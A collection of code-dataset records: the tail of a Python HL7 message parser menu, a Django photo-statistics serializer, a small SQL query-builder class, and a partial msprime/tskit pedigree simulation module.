LAB ORDER MENU AFTER RESULT OF LAST MENU SELECTION\n menu_Lab_Order()\n option_Lab_Order = int(input(\"Enter a number for the corresponding Lab Order information: \"))\n else:\n # DISPLAY MAIN MENU AFTER OPTION \"0\" SELECTED IN PREVIOUS MENU TO GO BACK\n print() # Added for one line of space between menus...\n menu()\n option_Menu = int(input(\"Enter a number for the message section you would like to view: \"))\n\n elif option_Menu == 5:\n # DISPLAY LAB RESULT MENU\n print() # Added for one line of space between menus...\n menu_Lab_Result()\n option_Lab_Result = int(input(\"Enter a number for the Lab Result information you would like to view: \"))\n \n # Entering \"0\" breaks out of the while loop, prints the main menu options, then prompts the user to select an option from the main menu.\n while option_Lab_Result != 0:\n if option_Lab_Result == 1:\n print(\"\\n\" + \"1\" + \"\\n\")\n #print(\"\\n\" + \"Entire Observation/Result Segment (OBX) - All Occurences: \" + \"\\n\" + str(segment(hl7_split, \"OBX\")) + \"\\n\")\n #print(\"\\n\" + \"Entire Observation/Result Segment (OBX) - All Occurences: \" + \"\\n\" + + \"\\n\")\n #print(\"\\n\" + \"Entire Observation/Result Segment (OBX) - All Occurences: \" + \"\\n\" + re.findall(str(segment(hl7_split, \"OBX\")), str(hl7_split)) + \"\\n\")\n #print(\"\\n\" + \"Entire Observation/Result Segment (OBX) - All Occurences: \")\n #print(segment(hl7_split, \"OBX\")[0:3])\n #print(hl7_split[0:3])\n #print(str(hl7_split.count(\"OBX\")))\n #print(len(re.findall(\"OBX\", str(hl7_split))))\n #for \"OBX\" in range(len(hl7_split)):\n #print(hl7_split[\"OBX\"])\n elif option_Lab_Result == 2:\n print(\"\\n\" + \"2\" + \"\\n\")\n else:\n print(\"\\n\" + \"Please enter a valid option.\")\n\n # DISPLAY LAB RESULT MENU AFTER RESULT OF LAST MENU SELECTION\n menu_Lab_Result()\n option_Lab_Result = int(input(\"Enter a number for the corresponding Lab Result information: \"))\n else:\n # DISPLAY MAIN MENU AFTER OPTION \"0\" SELECTED IN PREVIOUS MENU TO GO BACK\n print() # Added for one line of space between menus...\n menu()\n option_Menu = int(input(\"Enter a number for the message section you would like to view: \"))\n\n elif option_Menu == 6:\n # DISPLAY SPECIMEN MENU\n print() # Added for one line of space between menus...\n menu_Specimen()\n option_Specimen = int(input(\"Enter a number for the Specimen information you would like to view: \"))\n \n # Entering \"0\" breaks out of the while loop, prints the main menu options, then prompts the user to select an option from the main menu.\n while option_Specimen != 0:\n if option_Specimen == 1:\n print(\"\\n\" + \"Entire Specimen Segment (SPM): \" + \"\\n\" + str(segment(hl7_split, \"SPM\")) + \"\\n\")\n elif option_Specimen == 2:\n print(\"\\n\" + \"2\" + \"\\n\")\n elif option_Specimen == 3:\n print(\"\\n\" + \"3\" + \"\\n\")\n elif option_Specimen == 4:\n print(\"\\n\" + \"4\" + \"\\n\")\n elif option_Specimen == 5:\n print(\"\\n\" + \"5\" + \"\\n\")\n else:\n print(\"\\n\" + \"Please enter a valid option.\")\n\n # DISPLAY SPECIMEN MENU AFTER RESULT OF LAST MENU SELECTION\n menu_Specimen()\n option_Specimen = int(input(\"Enter a number for the corresponding Specimen information: \"))\n else:\n # DISPLAY MAIN MENU AFTER OPTION \"0\" SELECTED IN PREVIOUS MENU TO GO BACK\n print() # Added for one line of space between menus...\n menu()\n option_Menu = int(input(\"Enter a number for the message section you would like to view: \"))\n else:\n # DISPLAY MAIN MENU AFTER INVALID NUMBER ENTERED\n print(\"\\n\" + \"Invalid option! You must enter a number between 1 and 6...\" + \"\\n\")\n menu()\n option_Menu = int(input(\"Enter a number for the message section you would like to view: \")) \nelse:\n # DISPLAY MAIN MENU AFTER OPTION \"0\" SELECTED IN PREVIOUS MENU TO GO BACK\n menu()\n option_Menu = int(input(\"Enter a number for the message section you would like to view: \"))\n\n# DISPLAY MESSAGE TO NOTIFY USER THEY HAVE EXITED THE HL7 PARSER AFTER OPTION \"0\" SELECTED IN MAIN MENU \nprint(\"You have exited the HL7 Program.\")\n\n\"\"\"\nThe \"hl7_segments(hl7_split)\" function:\n 1. Takes one argument, which is the variable \"hl7_split\".\n 2. Creates a new dictionary assigned to the variable \"hl7_dictionary\".\n 3. Iterates through the new dictionary using a \"for\" loop, checking for the \"segment\" variable.\n 4. Defines the \"segment\" variable as the index of the items in the new dictionary, and assigns this to the variable \"segment_split\"\n 5. Returns the entire new dictionary as a list split up into each segment of the original HL7 v2.5.1 message.\n\"\"\"\n\"\"\"\ndef hl7_segments(hl7_split):\n hl7_dictionary = dict(hl7 = hl7_split)\n for segment in hl7_dictionary:\n segment_split = hl7_dictionary[segment]\n \n #print(segment_split)\n #return segment_split\n print(hl7_dictionary)\n\n# Assigns a variable \"x\" to call the hl7_segments(hl7_split) function.\nhl7_segments(hl7_split)\n\"\"\"\n\"\"\"\ndef segment(hl7_split):\n newdict = {}\n for line in hl7_split:\n if line[0:3] not in newdict:\n newdict[line[0:3]] = []\n newdict[line[0:3]].append(line[3:])\n else:\n newdict[line[0:3]].append(line[3:])\n \n #pprint.pprint(newdict)\n pprint.pprint(newdict)\n\nsegment(hl7_split)\n\ndef segment(hl7_split):\n newdict = {}\n for segment in hl7_split:\n key = segment[0:3]\n value = segment[3:]\n\n if key not in newdict:\n newdict[key] = []\n newdict[key].append([field.split(\"^\") for field in value.split(\"|\")][1:])\n \n else:\n newdict[key].append([field.split(\"^\") for field in value.split(\"|\")][1:])\n\n #print(newdict[\"MSH\"][0][2][0])\n return newdict[\"MSH\"][0][2][0]\n\"\"\"\n\n\"\"\"\nThe \"hl7_fields(hl7_segments(hl7_split))\" function:\n 1. Takes one argument, which is the result of the \"hl7_segments(hl7_split)\" function.\n 2. Creates a new list assigned to the variable \"segment_list\".\n 3. Iterates through the new list using a \"for\" loop, checking for the \"field\" variable.\n 4. Defines the \"field\" variable as the index of the items in the new list, and assigns this to the variable \"field_split\"\n 5. Returns the entire new list as a list split up into each field of the segment of the original HL7 v2.5.1 message.\n\"\"\"\n\"\"\"\ndef hl7_fields(x):\n x_split = x.split(\"|\")\n segment_list = list(x_split)\n for field in segment_list:\n field_split = segment_list[field]\n \n print(field_split)\n #return field_split\n\n# Call the hl7_fields(hl7_segments(hl7_split)) function.\nhl7_fields(x)\n\"\"\"\n\"\"\"\nsegment_split = hl7.split(\"\\n\")\n\nhl7_dictionary = dict(hl7 = hl7_split)\nfor segment in hl7_dictionary:\n segment_split = hl7_dictionary[segment]\n# convert to \"return\" instead of \"print\"\nprint(segment_split)\n\n\nmsh = hl7_split[0]\n#pid = hl7_split[1]\n\nmsh_split = msh.split(\"|\")\nfield = msh_split[3]\n\nfield_split = field.split(\"^\")\ntarget = field_split[0]\n\n#print(field)\n#print(field_split)\n\n#newdict = dict(hl7 = msh_split)\n#print(newdict)\n\n#newdict = dict(msh = msh_split)\n#print(newdict)\n\n#newdict = dict(field = field_split)\n#print(newdict)\n\n#print(target)\n#print(*msh_split, sep=\"\\n\")\n\"\"\"\n\"\"\"\n#, sep=\"\\n\" + \"\\n\"\nfor x in hl7_split:\n hl7_split[x] = segment\n \nsegment_split = segment.split(\"|\")\n\n#print(*hl7_split, sep=\"\\n\")\n#print(*pid.split(\"|\"), sep=\"\\n\")\n#print(*pid.split(\"|\"), sep=\"\\n\")\n\n# print(testing.index(\"MSH\"))\n# print(testing.index(\"PID\"))\n# print(testing.index(\"SPM\"))\n\n# for y in testing:\n# y = testing.index(\"\\n\")\n# print(y)\n\"\"\"","repo_name":"jarrettsmo/INF360VA_Midterm_HL7Parser_JarrettSmolarkiewicz","sub_path":"extraCode.py","file_name":"extraCode.py","file_ext":"py","file_size_in_byte":30088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"70813855561","text":"from rest_framework import serializers\nfrom photo_statistic.models import PhotoStatistic\nfrom photo.models import Photo\nfrom user.models import User\nfrom photo.serializer import PhotoSerializer\nfrom nltk import tokenize\nfrom operator import itemgetter\nimport math\nfrom nltk.corpus import stopwords \nfrom nltk.tokenize import word_tokenize\n\nclass PhotoStatisticSerializer(serializers.ModelSerializer):\n statistic = serializers.SerializerMethodField()\n # photo_description = serializers.SerializerMethodField()\n\n class Meta:\n model = PhotoStatistic\n fields = '__all__' \n\n def get_statistic(self, statistic):\n item = statistic.photo.__dict__\n item_statistic = statistic.__dict__\n import pprint\n pp = pprint.PrettyPrinter(indent=4)\n \n stop_words = set(stopwords.words('portuguese'))\n stop_words_english = set(stopwords.words('english'))\n words = item['photo_description']\n if not len(words):\n user = User.objects.filter(user_id=item['user_id'])\n values = [ x for x in user.values('description') ]\n if values[0]['description']:\n words = values[0]['description']\n else:\n words = ''\n print(item['user_id'],\"------------\",values[0])\n \n \n\n time = item_statistic['photo_statistic_time']\n\n total_words = words.split()\n total_word_length = len(total_words)\n total_sentences = tokenize.sent_tokenize(words)\n total_sent_len = len(total_sentences)\n \n tf_score = {}\n for each_word in total_words:\n each_word = each_word.replace('.','')\n if each_word not in stop_words and each_word not in stop_words_english:\n if len(each_word) > 2:\n if each_word in tf_score:\n tf_score[each_word] += 1\n else:\n tf_score[each_word] = 1\n \n tf_score.update((x, y/int(total_word_length) + time) for x, y in tf_score.items())\n # photos = Photo.objects.all()\n \n return tf_score\n ","repo_name":"LuanMattos/circle-api-django","sub_path":"photo_statistic/serializer.py","file_name":"serializer.py","file_ext":"py","file_size_in_byte":2157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"33789869059","text":"\"\"\"\n All this SQL is terribly horribly wrong.\n Django devs decided to get rid of subqueries in extra/tables\n https://djangosnippets.org/snippets/236/\n https://code.djangoproject.com/ticket/7907\n Explaining that raw() could replace it completely, but is doesn't.\n So we got what we've got. I am kinda hate those guys now.\n Also, there are some minor performance issues on pre 5.5 MySQL,\n because it can't do const subquery\n\"\"\"\n\n\nclass Query(object):\n \"\"\"\n Class helps to construct a custom SQL query\n It holds params to pass to ORM in array\n \"\"\"\n conditions = None\n params = None\n fields = None\n tables = None\n\n def __init__(self, conditions=None, params=None, fields=None, tables=None):\n self.conditions = conditions or []\n self.params = params or {}\n self.fields = fields or []\n self.tables = tables or []\n\n def get_query(self):\n conditions_string = \") AND (\".join(self.conditions)\n tables_string = \", \".join(self.tables)\n fields_string = \", \".join(self.fields)\n result = \"SELECT {fields!s} FROM {tables!s}\".format(\n fields=fields_string,\n tables=tables_string\n )\n if self.conditions:\n result += \" WHERE({conditions!s})\".format(conditions=conditions_string)\n return result\n\n def get_raw_query(self):\n return self.get_query().format(**self.params)\n","repo_name":"grey0ne/django-protector","sub_path":"protector/query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"63"} +{"seq_id":"15427038670","text":"import os\nimport pandas as pd\nimport numpy as np\nimport msprime\nimport networkx as nx\nimport tskit\nimport matplotlib.pyplot as plt\nimport itertools\n\ndef show_plots():\n plt.ioff()\n plt.show()\n\nclass Pedigree(tskit.TableCollection):\n '''\n A wrapper for a tskit TableCollection. Should be usable anywhere a TableCollection is usable.\n '''\n\n def __init__(self, table_collection: tskit.TableCollection):\n table_copy = table_collection.copy()\n self.__dict__ = table_copy.__dict__\n self.generate_additional_pedigree_data()\n return\n \n def generate_additional_pedigree_data(self):\n self.individuals.metadata_schema = tskit.MetadataSchema.permissive_json()\n self.children_table = self.generate_children_table()\n self.proband_individuals = self.get_proband_individuals()\n self.proband_descendent_table = self.generate_proband_descendent_table()\n return\n \n def export_simple(self, filename):\n return export_simple(self, filename)\n \n def generate_proband_descendent_table(self):\n return generate_proband_descendent_table(self)\n \n def get_proband_genealogy(self, proband_individuals: list):\n return get_proband_genealogy(self, proband_individuals)\n\n def get_descendents_genealogy(self, ancestral_nodes: list):\n return get_descendents_genealogy(self, ancestral_nodes)\n\n def predicted_contribution(self):\n return predicted_contribution(self)\n \n def predict_contributions_coalescences(self):\n return predict_contributions_coalescences(self)\n\n def get_proband_individuals(self):\n return get_proband_individuals(self)\n \n def generate_children_table(self):\n return generate_children_table(self)\n\n def display(self, labels:dict=None, font_size=12, block=True):\n draw_pedigree(self, labels=labels, font_size=font_size, block=block)\n\n def relabel(self):\n relabel(self)\n\ndef to_pedigree(pedigree: tskit.TableCollection) -> Pedigree:\n '''\n Converts a tskit TableCollection to a pedigree_tools Pedigree, in-place.\n It is recommended to use Pedigree() instead of this method,\n as Pedigree() returns a deep copy of the input TableCollection\n '''\n pedigree.__class__ = Pedigree\n pedigree.generate_additional_pedigree_data()\n return pedigree\n\n\ndef relabel(pedigree: tskit.TableCollection):\n '''\n Sets 'label' metadata to the current individual ids. Useful for sorting/trimming pedigrees and retaining the same individual labels.\n '''\n for individual_id, individual in enumerate(pedigree.individuals):\n pedigree.individuals[individual_id] = individual.replace(metadata={'label':individual_id})\n return\n\n\ndef generate_children_table(pedigree: tskit.TableCollection):\n '''\n Generates a dictionary mapping each individual to its children.\n '''\n children_table = {}\n for individual_id, individual in enumerate(pedigree.individuals):\n for parent in individual.parents:\n if parent != -1:\n if parent not in children_table:\n children_table[parent] = set()\n children_table[parent].add(individual_id)\n return children_table\n\ndef generate_proband_descendent_table(pedigree: tskit.TableCollection):\n '''\n Generates a dictionary mapping each individual to its proband descendents.\n '''\n proband_descendent_table = {}\n if isinstance(pedigree, Pedigree):\n proband_individuals = pedigree.proband_individuals\n children_table = pedigree.children_table\n else:\n proband_individuals = get_proband_individuals(pedigree)\n children_table = generate_children_table(pedigree)\n for individual_id in proband_individuals:\n proband_descendent_table[individual_id] = {individual_id}\n \n def _get_proband_descendents(individual_id):\n if individual_id not in proband_descendent_table:\n proband_descendent_table[individual_id] = set()\n if individual_id not in children_table:\n return proband_descendent_table[individual_id]\n for child_id in children_table[individual_id]:\n proband_descendent_table[individual_id].update(_get_proband_descendents(child_id))\n\n return proband_descendent_table[individual_id]\n\n for individual_id in range(len(pedigree.individuals)):\n _get_proband_descendents(individual_id)\n return proband_descendent_table\n\ndef generate_pedigree(num_probands=None, population_size=None, end_time=None, num_pedigrees=None, random_seed=None) -> Pedigree | list[Pedigree]:\n '''\n Generates a pedigree with the specified number of sample individuals, out of a population of the specified size, with the specified number of generations.\n '''\n if population_size is None:\n raise ValueError('Population size must be specified.')\n if num_probands is not None and num_probands > population_size:\n raise ValueError('Number of probands cannot be larger than the size of the population.')\n \n pedigrees = []\n for i in range(1 if num_pedigrees == None else num_pedigrees):\n pedigree = msprime.pedigrees.sim_pedigree(population_size=population_size, random_seed=random_seed+i, sequence_length=1, end_time=end_time)\n to_pedigree(pedigree)\n if num_probands is None:\n pedigrees.append(pedigree)\n else:\n pedigrees.append(pedigree.get_proband_genealogy(itertools.islice(pedigree.proband_individuals, num_probands)))\n\n if num_pedigrees == None:\n return pedigrees[0]\n else:\n return pedigrees\n\ndef get_proband_individuals(pedigree: tskit.TableCollection):\n ped_ts = pedigree.tree_sequence()\n sample_ids = set()\n for node_id in ped_ts.samples():\n sample_ids.add(ped_ts.nodes_individual[node_id])\n return sample_ids\n\ndef get_proband_genealogy(pedigree: tskit.TableCollection, chosen_probands):\n '''\n Gets the genealogical history of the chosen probands from the pedigree.\n In other words, this removes all individuals from a pedigree that are not ancestral to the chosen probands.\n Input: A number of sample individuals and a pedigree including those individuals\n Output: A pedigree with all individuals other than the chosen probands and their ancestors removed.\n '''\n if isinstance(chosen_probands, set):\n chosen_proband_set = chosen_probands\n else:\n chosen_proband_set = set(chosen_probands)\n if isinstance(pedigree, Pedigree):\n proband_descendent_table = pedigree.proband_descendent_table\n else:\n proband_descendent_table = generate_proband_descendent_table(pedigree)\n relevant_nodes = [node_id for node_id, node in enumerate(pedigree.nodes) if intersects(chosen_proband_set, proband_descendent_table[node.individual])]\n #print(relevant_nodes)\n subset_pedigree = pedigree.copy()\n subset_pedigree.subset(relevant_nodes)\n to_pedigree(subset_pedigree)\n return subset_pedigree\n\ndef individual_stat_from_nodes(node_stats, pedigree: tskit.TableCollection):\n pedigree.sort_individuals()\n #print(node_stats)\n individual_stats = np.zeros(int(len(node_stats)/2))\n #print(individual_stats)\n for node_id, stat in enumerate(node_stats):\n individual_stats[pedigree.nodes[node_id].individual] += stat[0]\n print\n return individual_stats\n\ndef intersects(a: set, b: set):\n '''\n Returns True if there is any intersection between a and b\n '''\n return not a.isdisjoint(b)\n\ndef get_descendents_genealogy(pedigree: tskit.TableCollection, ancestral_individuals: list):\n '''\n Gets the genealogical history of all descendents of the chosen individuals.\n In other words, this removes all individuals from a pedigree that are not ancestral to the descendents of the chosen node.\n Input: A number of sample individuals and a pedigree including those individuals.\n Output: A pedigree with all individuals other than the descendents of chosen individuals, and their ancestors, removed.\n '''\n chosen_proband_set = set()\n if isinstance(pedigree, Pedigree):\n proband_descendent_table = pedigree.proband_descendent_table\n else:\n proband_descendent_table = generate_proband_descendent_table(pedigree)\n for ancestral_id in ancestral_individuals:\n chosen_proband_set.update(proband_descendent_table[ancestral_id])\n\n return get_proband_genealogy(pedigree, chosen_proband_set)\n\ndef export_simple(pedigree: tskit.TableCollection, filename):\n with open(filename, 'w') as file:\n for individual_id, individual in enumerate(pedigree.individuals):\n file.write(f'{individual_id} {individual.parents[0]} {individual.parents[1]}\\n')\n\ndef draw_pedigree(pedigree: tskit.TableCollection, labels = None, font_size=12, block=True):\n '''\n Creates a matplotlib plot of a tskit pedigree.\n ''' \n ped_ts = pedigree.tree_sequence()\n G = nx.DiGraph()\n if labels is None:\n labels = {}\n for ind in ped_ts.individuals():\n if isinstance(ind.metadata, dict):\n if 'label' in ind.metadata:\n labels[ind.id] = ind.metadata['label']\n elif 'file_id' in ind.metadata:\n labels[ind.id] = ind.metadata['file_id']\n if ind.id not in labels:\n labels[ind.id] = ind.id\n time = ped_ts.node(ind.nodes[0]).time\n pop = ped_ts.node(ind.nodes[0]).population\n G.add_node(ind.id, time=time, population=pop)\n for p in ind.parents:\n if p != tskit.NULL:\n G.add_edge(ind.id, p)\n pos = nx.multipartite_layout(G, subset_key=\"time\", align=\"horizontal\")\n colours = plt.rcParams['axes.prop_cycle'].by_key()['color']\n node_colours = [colours[node_attr[\"population\"]] for node_attr in G.nodes.values()]\n fig, axes = plt.subplots(nrows=1, ncols=1)\n \n nx.draw_networkx(G, pos, with_labels=True, labels=labels, node_color=node_colours, font_size=font_size, ax=axes, bbox={'fc':'r'})\n if block==False:\n plt.ion()\n plt.show()\n\ndef predicted_contribution(pedigree: tskit.TableCollection):\n pedigree.sort_individuals()\n ped_ts = pedigree.tree_sequence()\n proband_ids = get_proband_individuals(pedigree)\n contribution = np.zeros(ped_ts.num_individuals)\n #print([ind for ind in ped_ts.individuals()])\n #print(sample_ids)\n for ind in reversed(ped_ts.individuals()):\n if ind.id in proband_ids:\n contribution[ind.id] = 2\n if ind.parents[0] != -1:\n contribution[ind.parents[0]] += 0.5*contribution[ind.id]\n #print(ind.id, contribution[ind.id], ind.parents[0], contribution[ind.parents[0]])\n if ind.parents[1] != -1:\n contribution[ind.parents[1]] += 0.5*contribution[ind.id]\n #print(ind.id, contribution[ind.id], ind.parents[1], contribution[ind.parents[1]])\n return contribution\n\ndef predict_contributions_coalescences(pedigree: tskit.TableCollection):\n pedigree.sort_individuals()\n ped_ts = pedigree.tree_sequence()\n proband_ids = get_proband_individuals(pedigree)\n contributions = [[] for i in range(ped_ts.num_individuals)]\n contribution_sum = np.zeros(ped_ts.num_individuals)\n coalescences = np.zeros(ped_ts.num_individuals)\n for ind in reversed(ped_ts.individuals()):\n if ind.id in proband_ids:\n contributions[ind.id] = [2]\n contribution_sum[ind.id] = sum(contributions[ind.id])\n coalescences[ind.id] = (sum(contributions[ind.id])**2 - sum(contribution**2 for contribution in contributions[ind.id]))/4\n if ind.parents[0] != -1:\n contributions[ind.parents[0]].append(0.5*contribution_sum[ind.id])\n #print(ind.id, contribution[ind.id], ind.parents[0], contribution[ind.parents[0]])\n if ind.parents[1] != -1:\n contributions[ind.parents[1]].append(0.5*contribution_sum[ind.id])\n #print(ind.id, contribution[ind.id], ind.parents[1], contribution[ind.parents[1]])\n return contribution_sum, coalescences\n\ndef predicted_cross_coalescent(pedigree: tskit.TableCollection):\n contribution = predicted_contribution(pedigree)\n return contribution\n\ndef load_and_verify_pedigree(fname):\n \"\"\"\n Output: verified four column pedigree dataframe\n\n Input:\n fname: string giving location of txt_ped-formatted genealogy.\n columns represent: ind, mother, father, generation (lon, lat are optional)\n\n This function:\n checks if file exists,\n sorts table in decending genealogical order (oldest to newest)\n identify pedigree founders and assign -1 values\n \"\"\"\n # ensure file exists\n try:\n f = open(fname, 'rb')\n except FileNotFoundError:\n print(\"file {} does not exist\".format(fname))\n raise\n\n # genealogy_table instead of fp\n\n # load the genealogy file\n fp = pd.read_csv(fname)\n # reverse sort by pseudo-time such that parents are before their children\n #fp = fp.sort_values([\"generation\"], ascending = (False)).reset_index(drop=True)\n\n # identify and recode founder individuals\n\n # these are the individuals in the pedigree\n ped_inds = fp[\"ind\"].values\n # assign -1 to founding fathers\n fp.loc[~fp[\"father\"].isin(ped_inds), \"father\"] = -1\n # assign -1 to founding mothers\n fp.loc[~fp[\"mother\"].isin(ped_inds), \"mother\"] = -1\n\n return fp\n\ndef convert_txt_to_msprime(inFile: str, outFile: str):\n \"\"\"\n Converts a txt_ped-formatted genealogy to the msprime format, and saves it as new file.\n :param str inFile: Name of the input text file.\n :param str inFile: Name of the output text file.\n \"\"\"\n fp = load_and_verify_pedigree(inFile)\n fp.rename(columns = {'ind':'id', 'mother':'parent0', 'father':'parent1', 'generation':'time' }, inplace = True)\n\n fp = fp.replace(-1, '.')\n fp[\"time\"] = fp[\"time\"].astype(float)\n fp[\"is_sample\"] = 1\n #print(fp.to_string())\n prep = open(outFile, 'w')\n prep.write('# ')\n prep.close()\n fp.to_csv(outFile, sep=' ', mode='a', index=False)\n\ndef add_individuals_to_pedigree(pb, text_pedigree, f_pop, p_pop):\n \"\"\"\n Output: PedigreeBuilder object built from text_pedigree\n\n Input:\n pb: an msprime builder pedigree with a predefined demography\n text_pedigree: four column text pedigree from load_and_verify_genealogy\n\n This function:\n loops through each individual in text pedigree\n adds individual to msprime pedigree with:\n parents, time, population and metadata of individual_name from text pedigree\n \"\"\"\n # dictionaries linking text_pedigree ids to msprime ids\n txt_ped_to_tskit_key = {}\n\n # determine if lon lat present in text pedigree\n if {'lon', 'lat'}.issubset(text_pedigree.columns):\n geo = True\n else :\n geo = False\n\n # determine if marriage date present in text pedigree\n if {'datem'}.issubset(text_pedigree.columns):\n date = True\n else :\n date = False\n\n # determine if marriage decade present in text pedigree\n if {'decade'}.issubset(text_pedigree.columns):\n decade = True\n else :\n decade = False\n\n # determine if new id is present in text pedigree\n if {'new_id'}.issubset(text_pedigree.columns):\n new_id = True\n else :\n new_id = False\n\n # for each individual in the genealogy\n for i in text_pedigree.index:\n # relevant information to load into PedigreeBuilder\n ind_time = text_pedigree[\"generation\"][i]\n ind_id = text_pedigree[\"ind\"][i]\n father_id = text_pedigree[\"father\"][i]\n mother_id = text_pedigree[\"mother\"][i]\n\n # add father\n if father_id == -1 :\n father = pb.add_individual(time=ind_time+1,\n population=f_pop,\n metadata={\"individual_name\": str(father_id)})\n else:\n try:\n father = txt_ped_to_tskit_key[father_id]\n except KeyError:\n print(\"father key missing, check order of dictionary construction\")\n raise\n\n # add mother\n if mother_id == -1 :\n mother = pb.add_individual(time=ind_time+1,\n population=f_pop,\n metadata={\"individual_name\": str(mother_id)})\n\n else:\n try:\n mother = txt_ped_to_tskit_key[mother_id]\n except KeyError:\n print(\"mother key missing, check order of dictionary construction\")\n raise\n\n if geo and date and decade and new_id :\n metadata={\"individual_name\": str(ind_id),\n \"geo_coord\":[text_pedigree[\"lat\"][i],text_pedigree[\"lon\"][i]],\n \"date\":str(text_pedigree[\"datem\"][i]),\n \"decade\":str(text_pedigree[\"decade\"][i]),\n \"new_id\":str(text_pedigree[\"new_id\"][i]),\n }\n elif geo and date and new_id :\n metadata={\"individual_name\": str(ind_id),\n \"geo_coord\":[text_pedigree[\"lat\"][i],text_pedigree[\"lon\"][i]],\n \"date\":str(text_pedigree[\"datem\"][i]),\n \"new_id\":str(text_pedigree[\"new_id\"][i]),\n }\n elif geo and decade and new_id :\n metadata={\"individual_name\": str(ind_id),\n \"geo_coord\":[text_pedigree[\"lat\"][i],text_pedigree[\"lon\"][i]],\n \"decade\":str(text_pedigree[\"decade\"][i]),\n \"new_id\":str(text_pedigree[\"new_id\"][i]),\n }\n elif new_id :\n metadata={\"individual_name\": str(ind_id),\n \"new_id\":str(text_pedigree[\"new_id\"][i]),\n }\n else :\n metadata={\"individual_name\": str(ind_id)}\n # add individual\n child = pb.add_individual(time=ind_time,\n parents=[mother,father],\n population=p_pop,\n metadata=metadata)\n\n # update dictionary for downstream\n txt_ped_to_tskit_key[ind_id] = child # store for later use (?)\n\n return pb\n\ndef del_sensitive_metadata(md):\n del md[\"date\"]\n del md[\"new_id\"]\n\n return md\n\ndef censor_pedigree(ts):\n \"\"\"\n Output: a censored tree sequence (i.e. without parent-child links or IDs)\n\n Input:\n ts: a tree sequence\n\n This function:\n removes all sensitive metadata from the input text pedigree\n specifically, it removes:\n - individual_names\n - parents of each individual\n \"\"\"\n\n tables = ts.dump_tables()\n\n new_metadata = [del_sensitive_metadata(i.metadata) for i in tables.individuals]\n\n validated_metadata = [\n tables.individuals.metadata_schema.validate_and_encode_row(row) for row in new_metadata\n ]\n tables.individuals.packset_metadata(validated_metadata)\n\n # remove parents\n tables.individuals.packset_parents([[]] * tables.individuals.num_rows)\n\n censored_ts = tables.tree_sequence()\n\n return(censored_ts)\n\ndef clean_pedigree_for_publication(ts):\n \"\"\"\n Output: a cleaned tree sequence file (i.e. clean metadata, provenances, etc.)\n\n Input:\n ts: a tree sequence\n\n This function:\n removes useless metadata and provenances from the input tree sequence\n specifically:\n - sets geographical coordinates to `location`\n - only keeps the first two provenance entries\n - only keeps metadata cleared for publication\n \"\"\"\n # ensure pedigree is censored\n ts = censor_pedigree(ts)\n\n # load tables\n tables = ts.dump_tables()\n # only keep first two entries of provenances\n tables.provenances.truncate(2)\n # get the lat and lon for each individual\n location = np.array(list(ind.metadata[\"geo_coord\"] for ind in ts.individuals()))\n\n n = ts.num_individuals\n\n # set the location to lat/lon\n tables.individuals.set_columns(\n flags=tables.individuals.flags,\n location=location.reshape(2 * n),\n location_offset=2 * np.arange(n + 1, dtype=np.uint64),\n metadata=tables.individuals.metadata,\n metadata_offset=tables.individuals.metadata_offset)\n\n clean_ts = tables.tree_sequence()\n return(clean_ts)\n\ndef simulate_genomes_with_known_pedigree(\n text_pedigree,\n demography,\n model = \"hudson\", # model to recapitulate tree\n f_pop = \"EUR\", # population id of founders\n p_pop = \"EUR\", # population id in pedigree\n mutation_rate = 3.62e-8,\n rate_map = 1.20e-8,\n sequence_length = 1,\n sequence_length_from_assembly = 1,\n centromere_intervals = [0,0],\n censor = True,\n seed = 123\n ):\n \"\"\"\n Output: simulated genomes using input text pedigree\n\n Input:\n text_pedigree: four column text pedigree from load_and_verify_genealogy\n demography: msprime demography specification\n model: used to recapitulate the fixed pedigree -- \"hudson\" or \"WF\"\n f_pop: population id of founders\n p_pop: population id in pedigree\n sequence_length: genome length of tree sequence\n sequence_length_from_assembly: length including telomeres\n rate_map: recombination rate map defined by load_rate_map\n mtuation_rate: mutation rate used for dropping mutations down tree sequence\n seed: random seed used in simulations\n\n This function:\n initializes an msprime PedigreeBuilder from demography\n builds a pedigree using the input text_pedigree\n runs msprime.sim_ancestry within fixed pedigree (default diploid)\n using the recombination rate provided\n drops mutations down tree using provided mutation rate\n \"\"\"\n # demography used to recapitulate beyond input pedigree\n pb = msprime.PedigreeBuilder(demography)\n\n # build pedigree using input pedigree\n pb = add_individuals_to_pedigree(pb, text_pedigree, f_pop, p_pop)\n\n # check simple model https://github.com/tskit-dev/msprime/blob/57ef4ee3267cd9b8e711787539007b0cde94c55c/tests/test_pedigree.py#L151\n\n # initial state of tree sequence\n ts = pb.finalise(sequence_length = sequence_length)\n\n # simulation within fixed pedigree\n ts = msprime.sim_ancestry(\n initial_state = ts,\n recombination_rate = rate_map,\n model = \"fixed_pedigree\",\n random_seed = seed + 100\n )\n\n # simulation beyond fixed pedigree\n ts = msprime.sim_ancestry(\n initial_state = ts,\n recombination_rate = rate_map,\n demography = demography,\n random_seed = seed + 200,\n model = model # Could also do WF\n )\n # drop mutations down the tree\n ts = msprime.sim_mutations(\n ts,\n rate = mutation_rate,\n random_seed = seed + 300\n )\n\n if(censor): ts = censor_pedigree(ts)\n\n # remove centromere\n ts = ts.delete_intervals(intervals = centromere_intervals)\n # modify sequence length to include `right` telomere\n tables = ts.dump_tables()\n tables.sequence_length = sequence_length_from_assembly\n ts = tables.tree_sequence()\n return ts\n\ndef simulation_sanity_checks(ts, ped):\n \"\"\"\n ts is the output of run_fixed_pedigree_simulation\n text_pedigree is the output of load_and_verify_genealogy\n \"\"\"\n\n # probands are by definition at generation 0\n probands = ped.loc[ped['generation'] == 0][\"ind\"].values\n\n # reacall diploids have two nodes per sample\n assert ts.num_samples == 2 * len(probands)\n\n # TODO : assert samples IDs are the correctly stored\n #ts.tables.individuals[5].metadata['individual_name']\n\n pass\n\ndef drop_mutations_again(\n ts,\n inside_mut = 2.36e-8,\n outside_mut = 3.62e-8,\n seed = 0,\n ):\n \"\"\"\n Output: tree sequence with a new set of mutations\n\n Input:\n ts: a tree sequence\n inside_mut: mutation rate used _inside_ fixed pedigree\n outside_mut: mutation rate use _outside_ fixed pedigree\n\n NOTE: outisde_mut should match the one used in the demographic model.\n\n This function:\n removes all sites and mutations from the input tree sequence\n drops mutations down tree using provided the two mutation rates\n the optional seed argument 